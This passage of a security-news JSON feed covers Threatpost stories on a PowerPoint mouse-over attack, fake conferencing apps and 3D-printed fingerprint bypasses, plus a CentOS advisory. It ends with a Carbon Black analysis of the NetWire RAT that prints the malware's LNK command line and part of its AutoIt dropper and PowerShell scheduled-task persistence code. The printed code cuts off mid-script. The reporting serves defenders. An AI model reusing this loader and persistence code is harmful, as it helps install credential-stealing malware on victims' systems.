which does not meet the bar for security servicing\u2026 As such, this thread is being closed and no longer monitored,\u201d MSRC wrote back to the researcher.\n\nA Threatpost inquiry to Microsoft echoed the same. \u201cFor this social-engineering technique to be successful, the user must first take action to dismiss the security warning. We encourage our customers to practice good computing habits, including exercising caution when clicking on links to web pages, opening unknown files or accepting file transfers,\u201d a Microsoft spokesperson wrote in a statement.\n\nBelow is an animation of the \u201cHover with Power\u201d PoC in action:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/08160246/PowerPoint_Mouse_Over_Attack.gif>)**__**\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _****_[A Practical Guide to Securing the Cloud in the Face of Crisis](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_****_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**_**[Please register here](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>) for this sponsored webinar.**_\n", "modified": "2020-04-08T20:50:01", "published": "2020-04-08T20:50:01", "id": "THREATPOST:DDB85D763AB168B628766E54A0159AE2", "href": "https://threatpost.com/powerpoint-weakness-mouse-over-attack/154589/", "type": "threatpost", "title": "PowerPoint \u2018Weakness\u2019 Opens Door to Malicious Mouse-Over Attack", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-04-08T16:49:57", "bulletinFamily": "info", "description": "Popular conferencing apps have become a major cybercrime lure during the COVID-19 work-from-home era \u2013 and Skype is the undisputed leader when it comes to being impersonated by malicious downloads, researchers have found.\n\nAn April analysis from Kaspersky uncovered a total of 120,000 suspicious malware and adware packages in the wild masquerading as versions of the video calling app.\n\nIt should be said that Skype isn\u2019t alone in being targeted: The research found that among a total of 1,300 suspicious files not using the Skype name, 42 percent were disguised as Zoom, followed by WebEx (22 percent), GoToMeeting (13 percent), Flock (11 percent) and Slack (11 percent).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWith the rise of social distancing, Kaspersky experts investigated the threat landscape for social meeting applications to make sure users are safe and their communication experience is enjoyable,\u201d the firm said in an emailed analysis. \u201cSocial meeting applications currently provide easy ways for people to connect via video, audio or text when no other means of communication are available. However, cyber-fraudsters do not hesitate to use this fact and try to distribute various cyberthreats under the guise of popular apps.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/08110000/social-meeting-malware.png>)\n\nSome of the files found turned out to be simply knockoff versions of the real thing, but among the actual threats detected, a few malwares and file types came to the fore, including two [adware families](<https://threatpost.com/google-play-adware-30-million/144098/>): DealPly and DownloadSponsor.\n\n\u201cBoth families are installers that show ads or download adware modules,\u201d according to the analysis. \u201cSuch software typically appears on users\u2019 devices once they are downloaded from unofficial marketplaces.\u201d\n\nThere were also some malware threats disguised as .LNK files \u2013 shortcuts to applications \u2013 that Kaspersky detected as Exploit.Win32.CVE-2010-2568. This is \u201can old, yet still widespread malicious code that allows attackers to infect the target with additional malware,\u201d according to the firm. The old, patched [vulnerability it uses](<https://nvd.nist.gov/vuln/detail/CVE-2010-2568>) is a Windows Shell that is not properly handled during icon displays in Windows Explorer, which allows arbitrary code execution via specially crafted .LNK or .PIF shortcut files. It affects Windows XP, Vista and Windows 7, mostly.\n\nTrojans were also a popular malware type found in the fake apps, especially Skype, the firm found.\n\n\u201cIn the current landscape, when most of us are working from home, it is extremely important to make sure that what we use as a tool for online social meeting is downloaded from a legitimate source, set up properly and doesn\u2019t have severe unpatched vulnerabilities,\u201d said Denis Parinov, security expert at Kaspersky, via email.\n\n[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\n\n_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "modified": "2020-04-08T16:23:29", "published": "2020-04-08T16:23:29", "id": "THREATPOST:F3563336B135A1D7C1251AE54FDC6286", "href": "https://threatpost.com/skype-apps-hide-malware/154566/", "type": "threatpost", "title": "ThreatList: Skype-Themed Apps Hide a Raft of Malware", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T13:42:41", "bulletinFamily": "info", "description": "New research has found that it\u2019s possible to use 3D printing technology to create \u201cfake fingerprints\u201d that can bypass most fingerprint scanners used by popular devices. But, creating the attack remains costly and time-consuming.\n\nResearchers with Cisco Talos created different threat models that use 3D printing technology, and then tested them on [mobile devices](<https://threatpost.com/samsung-fix-galaxy-s10-fingerprint-sensor/149510/>) (including the iPhone 8 and Samsung S10), laptops (including the Samsung Note 9, Lenovo Yoga and HP Pavilion X360) and smart devices (such as a smart padlock).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/07133109/cisco-biometrics-attack.png>)\n\nClick to enlarge.\n\nThe fake fingerprints achieved an 80 percent success rate on average, where the sensors were bypassed at least once. Researchers did not have success in defeating biometrics systems in place on Microsoft Windows 10 devices (though they said that this does not mean they are not necessarily safer; just that this particular approach did not work).\n\nHowever, the bigger takeaway is the sheer amount of time and budget that it still takes when creating threat models to bypass fingerprint sensors. At the end of the day, researchers said they had to create more than 50 molds and test them manually, which took months \u2013 and, they struggled to stay under a self-imposed budget of $2,000. These challenges point to the fact that a scalable, easy type of attack is not yet possible for bypassing biometrics.\n\n\u201cBiometrics are not an [Achilles heel](<https://threatpost.com/researchers-bypass-apple-faceid-using-biometrics-achilles-heel/147109/>),\u201d Craig Williams, director of Cisco Talos Outreach, told Threatpost. \u201cBiometrics are something that makes it very, very easy to use. You don\u2019t have to remember a password. You don\u2019t have to enter a password, which makes it very fast and easy. You don\u2019t have to carry anything around with you. And so I think for most users, it\u2019s still perfectly fine.\u201d\n\n**Listen to the full interview in the Threatpost podcast, below, or [download direct here](<http://traffic.libsyn.com/digitalunderground/Podcast_Apr_8.m4v>). **\n\n[\n\n](<http://iframe%20style=border:%20none%20src=//html5-player.libsyn.com/embed/episode/id/13890680/height/360/theme/legacy/thumbnail/yes/direction/backward/%20height=360%20width=100%%20scrolling=no%20%20allowfullscreen%20webkitallowfullscreen%20mozallowfullscreen%20oallowfullscreen%20msallowfullscreen/iframe>)\n\n_Below is a lightly edited transcript of the podcast._\n\n**Lindsey O\u2019Donnell Welch:** Hello, everyone, this is Lindsey O\u2019Donnell Welch with Threatpost, and welcome back to the Threatpost podcast. Today we\u2019re going to be discussing some new research about fingerprint scanners on phones and computers. Cisco Talos today came out with some new research regarding how these scanners can be defeated using different technologies like 3D printing, and basically looking at fingerprint scanners and the security behind them in general. So joining me today is Craig Williams, director of Cisco Talos outreach, to discuss this latest research. Craig, thanks so much for joining me today on the podcast.\n\n**Craig Williams:** No problem. It\u2019s a pleasure to be here.\n\n**LO:** Let\u2019s just take a step back for a second and kind of give some context here. Can you talk a little bit about fingerprint scanners on mobile devices and really set the context on the current state of fingerprint scanning and how prevalent this type of scanning is right now?\n\n**CW:** Absolutely. So one of the problems security people have always had since the advent of the password is, how do we make it easy for users? And I\u2019m sure everyone\u2019s aware of all the jokes over the years of, you know, like passwords, like Hunter2 being typed in by users. And that\u2019s a real problem, right? Password reuse is constant. People share them inappropriately, they write them down. And so as security people, we\u2019re always looking for new technologies and new systems to make it easier for users to authenticate. And years and years and years ago, people started looking at biometrics. And I think it\u2019s safe to say that Apple was the first company that really made biometric security broad and available for the masses through their mobile devices. And I think it was a great success. Everyone knows how to use it. Everyone\u2019s aware of it now. A lot of people still use it today. And I think for most users, it\u2019s great.\n\n**LO:** Yeah, well, and I think that\u2019s very important to note. And then at the same time, there have been [security issues with these fingerprint sensor glitches](<https://threatpost.com/galaxy-s10-fingerprint-sensor-thwarted-with-screen-protector-report/149197/>). I don\u2019t know if you remember back in October, there was the whole fiasco with Samsung, where a couple users reported that anyone could bypass the Galaxy S10 fingerprint sensor if a third party silicon case was enclosing the phone. And so, you know, that was the whole thing. And Samsung ended up having to roll out a fix. So I think that brings up kind of the question, how secure are is this fingerprint scanning? And that kind of brings us to your research. Can you talk a little bit about, first of all the main goals of the research here in looking at the different threat models?\n\n**CW:** Absolutely. So you know, I think one of the things to remember is that up until recently, current events, thinking of a threat model wasn\u2019t something a normal user did. You know now, everyone, I mean, they may not be aware of the term threat model, but everyone when they go out in public thinks about what am I going to touch? Do I need gloves? Should I bring a mask or should I use hand sanitizer and they think about the threats are being posed to them today and how do I mitigate them? That\u2019s not always something that users think about. And so when we started looking into fingerprint security, we had heard a lot of fear and uncertainty and doubt about fingerprint based authentication. And what we wondered was, well, most of these studies don\u2019t really have public information. So could we do one, under say, a reasonable budget, and give users an idea of what the actual risk is? And clearly define it and define what\u2019s possible? And then help users understand what does that pose to their business? And what steps do they need to take to protect themselves? And that was really the origin story of this type of research.\n\n**LO:** Right and I like that you had highlighted the budget aspect of this because I do think that is something where, if you\u2019re looking at these types of attacks, it\u2019s really important to note, can this be something that is just carried out by an everyday user versus a sophisticated threat actor, or whatnot. And can this also be done at a scalable level? And so what were some of the main takeaways from the research?\n\n**CW:** Well, some of the main takeaways from the research is that vendors really had to make that fundamental choice that every security technology has to make. Right? And that that choice is really ease of use. Right? And this goes back to the very first passwords when people were designing the password system, is how do you make it something that\u2019s both secure, and something that\u2019s easy for users to use? Now, obviously, in the case of passwords, if you allow people to use single short words like cat, dog, love, hate, whatever, we can go through the list from hackers, it\u2019s very easy for users to remember but unfortunately, it\u2019s also very easy to guess. And so that\u2019s really where fingerprint based authentication comes into play. Because it kind of gets both worlds, it makes it secure, and it makes it easy to use. And so when we started diving down this, what we discovered was that, there are a couple of scenarios we wanted to investigate. And I think the most common ones that most people would understand is, well, someone\u2019s got to get the fingerprint. And so we defined three scenarios where that might happen. I think the most common one was someone providing it willingly, like, let\u2019s say, you go through a security checkpoint or into a building or whatever, or somebody swaps out your phone with theirs, and you know, you\u2019ve scanned your fingerprint. The next one was something a little bit, you know, more sneaky, you lift it off of something that someone touched. And then I think the other one was basically, like if somebody took a picture of your thumb \u2013 which, as a hilarious side story, my colleague, one of the researchers, Paul and I were working one day, and Paul is huge into 3D printing. And so naturally, he\u2019s cranking out masks for hospitals right now and face shields and all the equipment. And so he burns his hand. And, of course, I\u2019m doing similar things and I burn mine, and in an attempt to show some sort of like moral support, I\u2019m like,\u201d Ah, look, Paul, I burned my finger.\u201d And I realize I\u2019m about to send the guy doing our fingerprint research, a picture of my fingerprint.\n\n**LO:** Oh, man.\n\n**CW:** Yeah. So it happens easier than you think. Right? There are scenarios you put yourself in where you\u2019re actually leaving behind little bits of authentication. And this is really the downside of biometrics, right? Biometrics are very easy to use. But unlike a password, you know, most users don\u2019t write their password down everywhere. But people do leave biometric things around all the time. You know, you look at stuff you leave retinal prints, right? You look at a camera that could get a scan of it, you leave your fingerprints all over the place.\n\n**LO:** Right and and like a password, you can\u2019t change your fingerprint. So talk a little bit more about the creation of the threat models that you guys had put together as well is kind of what models and different types of sensor technology we\u2019re looking at.\n\n**CW:** Well, so the sensor technology did have some interesting things when we did the research, right, we looked at capacitive type fingerprints, we looked at ones that use optical scanners, and they all pose their own unique difficulties and challenges. And in the paper, we go through how we address those and the different scenarios we went in. But basically, we were able to collect the print using the three methods I mentioned earlier. And then we were able to, through a very detailed trial and error model we go through in the paper, iterate through different ways of actually producing a mold to make the print and that was really how we got past the capacitance issue. As it turns out, if you use plasticine, and you put it over your fingerprint very much like some of the stuff we\u2019ve seen in the movies like \u201cMission Impossible,\u201d it is possible to make it work fairly reliably on most vendors and actually use a fake print laying over your print. So that part of the movies is actually true. That was a little bit surprising for me.\n\n**LO:** Yeah, that is surprising. I mean, it seems like that is such maybe not simple but such an easy thing to be able to carry out. Is that what you guys found?\n\n**CW:** Well, so not exactly the answer\u2019s a little surprising. So let\u2019s first cover the \u201cwhy this is possible,\u201d right? Because I\u2019m sure if people had known about this 10 years ago, fingerprint based biometrics may not have looked like that, you know, good of a choice. But the reality is the advances we\u2019ve made in 3D printing over the last few years have been immense. And when you look at it, you know, current home devices that are available for a relatively small amount of money, are capable of printing down to .1 microns. And the reality is the ridges on your fingerprint, are many, many times that, I think they\u2019re around 400, 500 microns, and so on. When you think about it, you\u2019re actually capable of producing something that is more detailed than a fingerprint very easily in theory, and that\u2019s got footnotes and highlight all over it. The reality ended up being for the technology that we were using which again, we self imposed the $2,000 budget. It is currently very difficult to produce and achieve usable molds. The amount of time it took us to carry out this type of activity was significantly longer than we expected. It was a matter of, dozens and dozens and dozens of hours to produce usable molds and prints. And so this is not something that someone could do quickly unless they were going to dump an immense amount of money into it. You know, this isn\u2019t something that could happen if you handed your phone over to a third party to hold for 20 minutes. It\u2019s something that you would need a long amount of time to produce the print and then actually try it and use it. Now, of course, if that attacker had cloned your print earlier that might open you up to new avenues of attack.\n\nBut I think the really important takeaway for this, and this is, hopefully I\u2019m not getting too far ahead of myself. The really important takeaway of this was that this type of attack scenario is viable. We can caveat it with all the footnotes that we want, but it is viable. It is possible with equipment you can buy the store that you can put together in your house. But it is not easy. It requires a significant amount of expertise and a significant investment of time and resources to get right. And a significant amount of trial and error. That said, when you do all that you can produce prints that will fool most fingerprint based authentication systems.\n\n**LO:** Right. Yeah. Can you speak a little more to kind of the challenges? I know you mentioned the vast amount of time it took but then also, how difficult was it to stay within the budgetary restrictions that you guys self imposed, and I guess a follow up question for that would be, you know, where was the majority of the expenses coming from?\n\n**CW:** I think the majority of the initial investment was really the 3D printer itself, a printer that uses the the resin, which is the system we chose, because it\u2019s a little bit more detailed and better suited for these type of activities. So about I don\u2019t know, let\u2019s say $1,000 for a good printer, and then you\u2019ve got to buy a wash station to cure it. And so that right there is the vast majority of your $2,000 budget. And then of course, you have a lot of the material for your trial and error.\n\n**LO:** Right, right. And, can you talk also about the platforms that you were testing on? I know you guys were looking on mobile devices, as well as laptops and even then you said you tested smart devices. So like a padlock, and then USB encrypted pen drives, which I thought was really interesting. Were there any differences in terms of whether one of these platforms was working, was different in how it worked, versus others? Or what were some of the bigger takeaways from the various platforms that you guys were looking at.\n\n**CW:** So that was actually some of the more interesting parts of the research, right? When you look at it, really the choice, like I mentioned earlier, the choice that these vendors had to make was between security and ease of use. And the way that boils down in a fingerprint world is detail and accuracy. Now imagine you\u2019re a large vendor, and maybe you make a device that somebody carries around with them everyday like a phone, and they\u2019re using it all the time. You know, they go to the gym, lift weights, authenticate on their phone, right? They come in from an office. All day typing at a keyboard, they authenticate to their phone, they go dig a ditch all day long and really rub off a lot of the skin on their hands, and then they want to authenticate to their phone. So what the vendors had to choose from when they were designing these systems was really how picky do they want to be? How many different types of matches do they need to authenticate. And earlier you mentioned a vendor that basically had a very low bar, and you pushed on a plastic phone and it authenticated. And so that is definitely one into the extreme. And I think through our testing, we can safely say Microsoft is on the other end of that extreme. We were not able to fool Microsoft\u2019s technology. It was one of the most secure ones out there, and one of the most picky ones out there. And so I think those are good two ends of the stick.\n\nNow, I think it\u2019s important that everyone realize that fingerprint based authentication, I think we\u2019ve basically proven is not secure. Now, while we were not able to defeat the technology, Microsoft used that does not mean that it\u2019s going to be foolproof for the future. I think as 3D printing technology advances, this is going to continue to get easier and easier. Now, I don\u2019t want that to sound like an alarmist statement. I think for the vast majority of users, this is still a very viable security solution. A great way to think about this is an alarm system on your house. If you have an alarm system on your house, do you really think it\u2019s gonna keep out the world\u2019s best cat burglar? Absolutely not. And that\u2019s why when we talked about threat models earlier, I\u2019m glad that people are thinking about it, because that is incredibly advantageous in this case. What is your threat model? Who is going to get into your phone? Is it going to be your kid? Is it going to be someone if you drop it on the street? Or is it going to be a well funded adversary with hundreds of hours to set up and apply a system to break into your phone? I think for the vast majority of us, that latter case is not a realistic concern.\n\n**LO:** I also was wondering what would you say are kind of the best mitigations for these manufacturers, in terms of trying to prevent these types of attacks on fingerprint scanners. I mean, obviously, you know, I\u2019m sure that we don\u2019t have like, full insight into what specifically they\u2019re doing. But when you look at the iPhone or the iPad or or Samsung S10 or Huawei or some of the other ones that you guys were testing, is there anything that you could talk a little bit more to in terms of kind of mitigations?\n\n**CW:** Well, I think one of the best ways to deal with it is to try and figure out user success rate. You know, I\u2019m sure most vendors these days have some sort of diagnostic and metrics built into the devices to track for debugging purposes. And I think biometric authentication attempts and failures is a valid thing to track. And as a vendor, you could use that to help tune your algorithms to figure out, Oh, should we increase the, you know, resolution or the accuracy? Or, you know, or is it in a good place? Right, maybe it\u2019s only working 80% of the time. So we definitely don\u2019t want to make it a little bit more strict, maybe we\u2019re fine. You know, the good news here \u2013 And even if you\u2019re going to be the target of, you know, a well funded, adversary or a national security organization \u2013 is that the workaround is already built into every single device, right? You know, you just go into your settings menu and you go ahead and set up a password. And if you really want to go the extra mile, go ahead and set up two factor authentication. I believe most vendors support that now, I know definitely when I set up my iPhone and turn it on, I had to go to a different device and get the code and click Yep, that\u2019s me, and then go back to the device I was setting it up on and enter that information. So the workaround is there, right? Biometrics are not an Achille\u2019s heel. Biometrics are something that makes it very, very easy to use. You don\u2019t have to remember a password. You don\u2019t have to enter a password, it makes it very fast and easy. You don\u2019t have to carry anything around with you. And so I think for most users, it\u2019s still perfectly fine. I think our research actually proves that. This is not something that right now today is something you need to worry about the neighbor\u2019s kid doing it they get a hold of your phone. This is like a home security system, right? It\u2019s good enough, it\u2019s gonna keep most people out. Right? If you\u2019re securing trade secrets with it, if you\u2019re securing secrets that you know, a nation state may be after, perhaps you should not be using biometrics, you should be using a complex password with a multi factor authentication system. But you know what, that\u2019s the same advice I would give them before we started this research, right?\n\n**LO:** Yeah, exactly. It\u2019s like, that\u2019s kind of the typical using several security methods type of recommendation that is probably best for most practices.\n\n**CW:** Yeah. And I think this proves that. And so that\u2019s one of the things that I liked most about this research is we basically proved that it is not easy for the standard home user to bypass fingerprint based authentication. You know, it\u2019s possible with a large investment of money and a large investment of time, and a lot of trial and error, but it\u2019s not something you\u2019re just going to be able to do in 20 minutes.\n\n**LO:** Definitely. Well, I also wanted to ask before we wrap up, do you see this changing in the future? Whether it\u2019s because of 3D printing technology growing more prevalent, or because of other reasons? Do you think that there\u2019s going to be any sort of trend of these types of threat models growing more sophisticated? Or is that still to be seen at this point?\n\n**CW:** I think we will see evolutions in 3D printing technology, especially for home users. We\u2019re going to see new methodologies and new types of machines, which could make this system even weaker. We could see new threats to it and things along those lines. But I still think, very much like home security, right? I mean, if you look at the locks on your house, are they unpickable? Absolutely not, most locks securing homes could be picked inside of five minutes if not bumped open. That said, we still use locks, right? They still provide that minimum bar of security. And I think we all need to be cognizant that that\u2019s what biometric authentication is really providing. It\u2019s a minimum level of security, that if you\u2019re not in a high risk threat model, is fine. It\u2019s just, be aware that there are weaknesses and be aware of what those weaknesses are, and the complexity involved in attacking them. And that\u2019s really why we did this research.\n\n**LO:** Great. Yeah, definitely. Well, Craig, thank you so much for coming on today to talk a little bit about your research and really biometric security in general. I thought you had some really great points.\n\n**CW:** No worries. And thanks so much for the invite Lindsey.\n\n**LO:** Once again, this is Lindsey O\u2019Donnell Welch with Threatpost, joined by Craig Williams with Cisco Talos. Catch us next week on the Threatpost podcast.\n", "modified": "2020-04-08T13:00:24", "published": "2020-04-08T13:00:24", "id": "THREATPOST:88BD03A889778017FBD9BE646F7812DF", "href": "https://threatpost.com/fake-fingerprints-bypass-scanners-3d-printing/154535/", "type": "threatpost", "title": "'Fake Fingerprints' Bypass Scanners with 3D Printing", "cvss": {"score": 0.0, "vector": "NONE"}}], "centos": [{"lastseen": "2020-04-08T22:41:22", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2020:1021\n\n\nGNOME is the default desktop environment of Red Hat Enterprise Linux.\n\nSecurity Fix(es):\n\n* gnome-shell: partial lock screen bypass (CVE-2019-3820)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.8 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012403.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012422.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012424.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012450.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012454.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012455.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012456.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012457.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012458.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012459.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012461.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012493.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012498.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012506.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012536.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012537.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012551.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2020-April/012605.html\n\n**Affected packages:**\nLibRaw\nLibRaw-devel\nLibRaw-static\naccountsservice\naccountsservice-devel\naccountsservice-libs\ncolord\ncolord-devel\ncolord-devel-docs\ncolord-extra-profiles\ncolord-libs\ncontrol-center\ncontrol-center-filesystem\ngdm\ngdm-devel\ngdm-pam-extensions-devel\ngnome-classic-session\ngnome-online-accounts\ngnome-online-accounts-devel\ngnome-settings-daemon\ngnome-settings-daemon-devel\ngnome-shell\ngnome-shell-extension-alternate-tab\ngnome-shell-extension-apps-menu\ngnome-shell-extension-auto-move-windows\ngnome-shell-extension-common\ngnome-shell-extension-dash-to-dock\ngnome-shell-extension-disable-screenshield\ngnome-shell-extension-drive-menu\ngnome-shell-extension-extra-osk-keys\ngnome-shell-extension-horizontal-workspaces\ngnome-shell-extension-launch-new-instance\ngnome-shell-extension-native-window-placement\ngnome-shell-extension-no-hot-corner\ngnome-shell-extension-panel-favorites\ngnome-shell-extension-places-menu\ngnome-shell-extension-screenshot-window-sizer\ngnome-shell-extension-systemMonitor\ngnome-shell-extension-top-icons\ngnome-shell-extension-updates-dialog\ngnome-shell-extension-user-theme\ngnome-shell-extension-window-grouper\ngnome-shell-extension-window-list\ngnome-shell-extension-windowsNavigator\ngnome-shell-extension-workspace-indicator\ngnome-shell-extensions\ngnome-tweak-tool\ngsettings-desktop-schemas\ngsettings-desktop-schemas-devel\ngtk-update-icon-cache\ngtk3\ngtk3-devel\ngtk3-devel-docs\ngtk3-immodule-xim\ngtk3-immodules\ngtk3-tests\nlibcanberra\nlibcanberra-devel\nlibcanberra-gtk2\nlibcanberra-gtk3\nlibgweather\nlibgweather-devel\nmutter\nmutter-devel\nnautilus\nnautilus-devel\nnautilus-extensions\nosinfo-db\nshared-mime-info\n\n**Upstream details at:**\n", "modified": "2020-04-08T19:20:27", "published": "2020-04-08T17:41:15", "id": "CESA-2020:1021", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2020-April/012403.html", "title": "LibRaw, accountsservice, colord, control, gdm, gnome, gsettings, gtk, gtk3, libcanberra, libgweather, mutter, nautilus, osinfo, shared security update", "type": "centos", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "carbonblack": [{"lastseen": "2020-04-08T17:39:49", "bulletinFamily": "blog", "description": "NetWire, an information stealing RAT that dates back multiple years, has been witnessed in the wild recently using a tactic of combining Windows shortcut link files and AutoIt scripts. These scripts pose as BitTorrent files, a protocol used for direct peer-to-peer file transfers, to entrench and execute from a victimized system. This method of entrenchment is fairly new for this family and is detailed in this post.\n\nRecent variants now use a Windows shortcut link file to launch AutoIt scripts for entrenchment. These scripts are responsible for creating a Windows scheduled task to run an additional AutoIt script that injects the NetWire RAT into the execution memory space of AutoIt for stealing passwords from the local system and running a keylogger to collect all typed data.\n\nAt this time it\u2019s not known the exact delivery method that placed the files in question onto the victim system, but it\u2019s presumed to be the result of a transferred ZIP archive.\n\n## Entrenchment Method\n\nOnce downloaded, the malware contains four distinct files: Other Magazines (True PDF).lnk, zDownload1.torrent, zDownload2.torrent, and zDownload3.torrent. Their respective metadata is shown below:\n\nFile Name : Other Magazines (True PDF).lnk\n\nFile Size : 1,014\n\nMD5 : a307e5196f9c2f0563b15fe6e3570a72\n\nSHA256 : 49bfb9342410f5e078d0d912b31fa41a316b875c96172fa320e55af36660c9f7\n\nMagic : MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=3, ctime=Wed Dec 31 23:59:59 1969, mtime=Wed Dec 31 23:59:59 1969, atime=Wed Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized \n \n--- \n \nFile Name : zDownload1.torrent\n\nFile Size : 893,608\n\nMD5 : c56b5f0201a3b3de53e561fe76912bfd\n\nSHA256 : 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d\n\nMagic : PE32 executable (GUI) Intel 80386, for MS Windows\n\nCompiled Time : Thu Mar 15 13:14:39 2018 UTC\n\nPE Sections (5) : Name Size SHA256\n\n.text 583,680 e5852635547d75252b6415bc614590e9c288d264e1e8cb6e19aff7568fa6aa01\n\n.rdata 196,096 54716f42aea873871717fcf65defffabec8e32d82bc1190f180aedf013ce9ab9\n\n.data 20,992 ac054706046a25511e14861ebc4ec2b6c9af7ad43dfbbe3c2cd5b07af1158083\n\n.rsrc 55,296 6ea9bc4d89c5fa068f2be18637cab1bcf94c281c151b4c8248fce31a2f1fa076\n\n.reloc 29,184 c7502efc575419e5689704acce770acb35df698ccd690c53310040aec01f7707\n\n\\+ 0xd8600 7,336 Signed Certificate (CN=GlobalSign) \n \nFile Name : zDownload2.torrent\n\nFile Size : 179,252\n\nMD5 : cfb39cfa0699d3f325854a7de3409161\n\nSHA256 : 2c5c4f7bf50d5506ef443c3ad08f0ca62d2c330c724680019ae16c828d6b20ba\n\nMagic : ASCII text, with very long lines, with CRLF line terminators \n \nFile Name : zDownload3.torrent\n\nFile Size : 2,691\n\nMD5 : 43523693235fcbe2ff7db35873b231ee\n\nSHA256 : e2f388f375c4b04be87ec7cf9eaacaa1b7c6b9e7065b7b6c8124fd1ba7934248\n\nMagic : ASCII text, with CRLF line terminators \n \nTable 1: Malware file metadata\n\nThe Other Magazines (True PDF) link file contains a specific command line within its properties to be executed:\n\nC:\\Windows\\system32\\cmd.exe /C echo n|copy /-y zDownload1.torrent \"%appdata%\\Microsoft\\AutoIt3.exe\" & \"%appdata%\\Microsoft\\AutoIt3.exe\" zDownload3.torrent & START www.1337x.to\n\nThis command line, which is a series of commands chained together, will first copy the zDownload.torrent to the %APPDATA%\\Microsoft\\ folder as AutoIt3.exe. It will then run with the argument of file zDownload3.torrent. Finally it will open a web browser to the specified URL, a generic BitTorrent search engine.\n\nFrom analysis, the zDownload1.torrent file is indeed the AutoIt script language interpreter, a known-good executable file. However, it is often leveraged to execute malicious code AutoIt scripts. In this example, we can determine that zDownload3.torrent is such a script. Analysis of the script shows the following content (slightly modified for easier reading):\n\n; Binder Write By Nasserddine 30/03 .\n\nopt('TrayIconHide',1)\n\nGlobal $DSerial = DriveGetSerial(@HomeDrive & \"\\\") , $Time = @SEC\n\nIf @error Then\n\n$DSerial = StringToBinary ( @ComputerName & @UserName , 1)\n\nEndIf\n\nIf Not FileExists(@AppDataDir & \"\\Microsoft\\\" & $DSerial ) Then\n\nRDM()\n\nFileCopy(@ScriptDir & \"\\zDownload2.torrent\" , @AppDataDir & \"\\Microsoft\\\" & $DSerial , 0 )\n\nElse\n\nExit\n\nEndIf\n\n;==============================================================================================\n\nOpenP()\n\nFunc RDM()\n\n$HANDLE = FILEOPEN(@ScriptDir & \"\\zDownload2.torrent\", 1)\n\nFILESETPOS($HANDLE, \"\" , 2 )\n\n$sText = \"\"\n\nFor $i = 1 To Random( 3 , 30 , 1)\n\n$sText &= Chr(Random(65, 90 , 1))\n\nNext\n\nFILEWRITE($HANDLE , @CRLF & '$' & $sText & ' = ' & '\"' & $sText &'\"' )\n\nSleep(1000)\n\nFILECLOSE($HANDLE)\n\nSleep(1000)\n\nEndFunc\n\nFunc OpenP()\n\nShellExecute('Powershell.exe' , ' -ExecutionPolicy Bypass ; sleep 2 ; try{ '& _\n\n'$ts = New-Object -ComObject Schedule.Service ; ' & _\n\n'$ts.Connect() ; ' & _\n\n'$task = $ts.NewTask(0) ; ' & _\n\n'$reginfo = $task.RegistrationInfo ; ' & _\n\n\"$reginfo.Description = \" ; \" & _\n\n\"$reginfo.Author = \" ; \" & _\n\n'$principal = $task.Principal ; ' & _\n\n'$principal.LogonType = 3 ; ' & _\n\n'$settings = $task.Settings ; ' & _\n\n'$settings.Enabled = $true ; ' & _\n\n'$settings.StartWhenAvailable = $true ; ' & _\n\n'$settings.Hidden = $false ; ' & _\n\n'$settings.DisallowStartIfOnBatteries = $false ;' & _\n\n'$settings.StopIfGoingOnBatteries = $false ; ' & 